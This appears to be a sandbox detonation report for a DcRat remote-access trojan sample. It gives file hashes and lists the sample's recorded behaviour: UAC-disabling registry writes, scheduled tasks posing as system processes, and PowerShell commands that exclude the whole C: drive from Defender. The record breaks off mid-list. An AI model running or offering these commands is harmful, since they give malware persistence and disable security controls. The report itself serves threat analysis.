| SHA256 | 7f8e84fccd955d5e01646ca11ecc7a8b70f6985e36e1df0ece02f37c3d0b81e9 |
| SHA512 | ede3722171595d37bc14a9e484471dbfae21a4809e5149cb2b63936ad6867274c26efdbf290146e6a9e37609f8ff659fc5761aa84b32a5c79175f7c8fd019f23 |
C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\wininit.exe
| MD5 | 73270f0623b4e563f303814af8a35cdf |
| SHA1 | 99d2ec5a6d2796e6e82ae20a2bbce30efd2eec85 |
| SHA256 | 82cfd06a9b9ac15a3851ef57c628c02add7f85ec9fdffcb7cf5618fef87ea010 |
| SHA512 | c101b629eaba445c28830cd08abae82b21b629aec15894861077f9e2369324f5c7c84f38692555764ffd4914ffccde46ef7419346003924013d5a44627565b17 |
C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\audiodg.exe
| MD5 | 6be01e880b49b6468d97576d45dab300 |
| SHA1 | 38de2fdc20cc9c0537a778a1c94c1018d7f1203e |
| SHA256 | 41ad555e28f385deade32c635e35e0d7fb12698bd6cdac4e65af5940376cee60 |
| SHA512 | 021beb46a588e0fc058e6f22a6fe2dd03088b42ec89b615611093c03bea538fc486dca0ed6f4f3db499bf69cd0306a49648ac4022323922526bd61133848a2a5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d638a8aa8e6ca4ba671124c950a1d0a0 |
| SHA1 | ab787acb4582cbeca2b812df6e4ca95f9aa4d633 |
| SHA256 | 219f2c0b1fc00a6ad4dc91515b21a5c1474ed624b8ee3f9a777917604b0081ee |
| SHA512 | 79eaec864181cfb32bdcfe91d6fcdec68fd50e513abd6bb6cac586cc73bc152a6b3c1f54f578d1358c6532198876c561a13ac5ab816e7b00acdd2d0d065ba417 |
memory/1924-117-0x000007FEF5DA0000-0x000007FEF678C000-memory.dmp
memory/1596-128-0x00000000022B0000-0x00000000022B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bbdqqO4wF7.bat
| MD5 | 7e268009943c9f90f1ad458e64bd4145 |
| SHA1 | 0d62cc0b9b2a8ff27c75ee3c987eeac139bb3dcd |
| SHA256 | 62dec3c112c630ee367c57a19d8a9f7ccead079a5633c9f8d5178cfe09abedd2 |
| SHA512 | ded485da3f5b08ed9e995e0a86dd5476fe383cce982b8842ed205d90a6549fc5d28a0b3991820decfd69a4389665183d85a9be09a0dc45e73ed0f000026c220f |
memory/1596-110-0x000000001B5E0000-0x000000001B8C2000-memory.dmp
memory/2896-144-0x0000000000C70000-0x0000000000E12000-memory.dmp
memory/2416-179-0x000000001B600000-0x000000001B8E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rhJyFUC1sI.bat
| MD5 | 09f0ae9cb76a3e28f8732870f059cc96 |
| SHA1 | e815d34cb854c821ea430fe5a539658c2f7a5854 |
| SHA256 | aa19ae8aefbeb092fa3b2c05b6ce976e4965684c56ccc977403a1203322abe94 |
| SHA512 | c258a53859a16151f581a096fd68e2bb7688b47b825c6acfea9dc496db7cca703838773febbe5684265d0073e38e59ce321fb9df32bad68060263fc754f0359b |
memory/2416-184-0x0000000001E00000-0x0000000001E08000-memory.dmp
memory/756-213-0x0000000000A90000-0x0000000000C32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\49c80d33-fc82-49f6-9887-6194c9b9e4c9.vbs
| MD5 | 01b243ef9b7e78fca2c16f7652a45f82 |
| SHA1 | 38771516d9b0567ca3fe9b77d41278d5ab102103 |
| SHA256 | 4a6836a669635fed9f36b345c19723e370c16d6b2fc906c5c31d845c70640ed1 |
| SHA512 | 3e15cffa6331f63b49ad181b51c6df825cde51ffe784216d951f8fc8765a41e444476ed38c88c9f41fe368761b993c7f770cf6de74a92fefed142f21d67a8364 |
C:\Users\Admin\AppData\Local\Temp\6b0b9f79-e92d-461e-ba9d-035c6ade5369.vbs
| MD5 | 427c74111837ab25ebc3e957b7de878a |
| SHA1 | d802d9fdc0d1956f9de4f52138ccb34f4bbccaea |
| SHA256 | b523a1f332255b2ec005b9c5afe4fa1eddd963edcfa9c2fd0be439c9aca428ca |
| SHA512 | fd5bca024eb79c51b6b7a90335e1e7672dcc5ac7da7a862e7a3bc25036b0e31d1feb82d534b4b2cbca04d31752875e43141624f32947c75038512a1ba4a90202 |
C:\Users\Admin\AppData\Local\Temp\c00bb0f4-042f-4d3e-84f5-7199ba61a020.vbs
| MD5 | 6ddc8602de136cfa5a4ce2d411e665ec |
| SHA1 | a67108d2328754a5b1db9c53af3fb2f218a24fe8 |
| SHA256 | f71e4b31c347ea22ac7cf66ade9603b2be991244efe4407c9e544bb4c6ce8cf8 |
| SHA512 | 193111e66532ffd1bdc568918b9aad2d1956f9f3987d550661fd1747ff19fefda119cfdc1ae12752401489d75874b9345bdf493e7046e297a92d3cbd1bb029e2 |
memory/1508-235-0x0000000001100000-0x00000000012A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3fd1e594-cedb-4e66-881e-35b3b8dceec7.vbs
| MD5 | 3cb9ceab802c53b354a7d6a4749b7674 |
| SHA1 | 3d4a8a415e3b524dfd4ed851314f16566eccb329 |
| SHA256 | 69d170e27796c7396e64c8164070246d0b5b4833c415153388315e06738a47f6 |
| SHA512 | fbf13cd345096cc33e57e48e5a551b88ab761e08db9a13fe52bb78ee936c6ec1e409b0a9a476c962c830842ba3abda15cb4a2fd36c224268e9626e11556f35c6 |
memory/1644-247-0x00000000000A0000-0x0000000000242000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bcdc0d54-74b5-4bf0-a765-2c7ef67e8c19.vbs
| MD5 | 29ba92d387d4f243248b004cf0857f40 |
| SHA1 | 84796307761cce50e6fc60aab287bc620b87ae6b |
| SHA256 | 4bbe1433b54e1f85cac6f37a8bd378086a3e668f02279a66281e60d693c9e491 |
| SHA512 | 58a8998f0926c06b0efeca187ff8288c9822356658d4b2d62c278e85d9d795d56cdbb9e43da23f71ed7669d24c8b449a1620617d34e7292a9d86e21f9e7e5d29 |
memory/1596-259-0x00000000010C0000-0x0000000001262000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\514d493e-a860-4192-984f-dc65d6893eb9.vbs
| MD5 | 40f0984d0ded3b409f55488edb51475c |
| SHA1 | bfcdab74e6b53411c3f75c5b7b0f6b14e5082b96 |
| SHA256 | 6605dae4da5e4bb3ec6d69a1f635b32b9c3cf192791a60338c1efd1338474d3d |
| SHA512 | 1a37ddd6bb39e5dc12c59c885f93801503a274fc0609ada578ca01de400357849644d0bc81555fbdc0817cbb26519503bbd52eec7fe72729d7a433434697c67c |
memory/2944-271-0x00000000001F0000-0x0000000000392000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\48e748f3-a566-4a80-89e5-fd5c2e913cba.vbs
| MD5 | 37ce81857a22af9a1ac4599a4e8b6357 |
| SHA1 | c14de35236e37690db1c5be77307bfc63249da80 |
| SHA256 | bce354d6c030451f580193bb07261448cd94831c549861ea37c2f6e9606288ef |
| SHA512 | 59d14d71c51dd1f948e7ff827e22fb4d1ade8c5d26ef355f64762eb6d1d77525cff4b1d12bc1fca0cae8c37c5e460f7cf679015ce81b5eb1d8c336165c215612 |
memory/1892-283-0x0000000000AC0000-0x0000000000C62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\14bf4083-7c70-4ede-b737-48785590ba59.vbs
| MD5 | 56df3f3f5671dbcbe51c663d33abddc0 |
| SHA1 | 284c056228cfd33e32597b232104d110d7370a5b |
| SHA256 | 3e64a8de9257224e62ebff3b34db31892cea3e9ac2effa39f391dda378752750 |
| SHA512 | 40d95115dba215c551dc8eda0603e3849a866013c67ed41b75c36bffb967e68eda8a62d92dd5b9b88e66e001838da772a3b00e85029bfbfc5c87480acf6adb0d |
C:\Users\Admin\AppData\Local\Temp\02916f4a-e6af-4d0e-b264-909a38163ccf.vbs
| MD5 | c2d423d0db9ca53bac8a5054c82a0b7b |
| SHA1 | 2e6b5a9ca00bd03d004c9b093ec94fad83093b37 |
| SHA256 | f4a133f2af0cf84301e468638a926fdddf5110f4fca12974abfea44bddfa22b9 |
| SHA512 | cd5b0e4d8c168aa983a36c4cb477f36b1c1753a89094c1f8bb1fe4ed352459fcc14c18dc552be98c449193d452c31af809f0c010634fc0210d874067b956c8ff |
memory/1480-306-0x00000000002A0000-0x0000000000442000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\b8593642-4ae0-4d7b-a635-55ead738bac7.vbs
| MD5 | 2816adc772b71371a6192a942146c33c |
| SHA1 | ae5bfc395d8bd5a2e74fec628b43a4013a5b21b6 |
| SHA256 | 6ba7f65c9eaf991e194def1860ac3c77f9c27b30c02482bc7c771840beb95a9f |
| SHA512 | bf9452f406a88d8bd27c4f4a22f624eaaac65dbb794f3f480c0068abf641a307e33462448c776fb68128335aece3f63558a07b6e0fff0053180289e5d0e0f56d |
memory/1584-318-0x0000000000910000-0x0000000000AB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\64bd468e-b006-4891-8c9e-ed6fe8762c66.vbs
| MD5 | ab98b23fb4347d31512b21ae36d01342 |
| SHA1 | c80f267206d2638d51c5aa56443c999d3b581a99 |
| SHA256 | a6eea52c38284d8635762529ad038c5fd43d413f62421289b47d2765c5b88f2e |
| SHA512 | 771261f8449897ea25255f981f4994668469a153c14ae965d056ef322174de274703dee5d1733cd322194dbf60039485709721c869266b9a88a94841e899709d |
memory/1160-330-0x0000000000FE0000-0x0000000001182000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4182c578-166e-4201-bf9d-5ec13bf3a395.vbs
| MD5 | f9b3216288370816b0b19ecf76fc4337 |
| SHA1 | cf18e298ee510077c1ab5fc79c100f4aad0a1120 |
| SHA256 | eb804a9a3bfca4e1d63d77440812e3ca6ec4874d9597bb21136716ea6bdf0c7c |
| SHA512 | 9d300943bb825a010602d1d8066e609943e3b6cfcdbcfcdd355e3c40aa3ce85fd7e6d06f5a88bb696decf9035cf8034fbec810c78691ff98326063f9b563a637 |
memory/1432-342-0x0000000001370000-0x0000000001512000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20241010-en
Max time kernel
151s
Max time network
157s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| N/A | N/A | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| N/A | N/A | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe
"C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 8 /tr "'C:\Users\Public\taskhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 5 /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\W2tbEWSDqo.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe
"C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Windows\Setup\State\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Setup\State\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\Setup\State\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
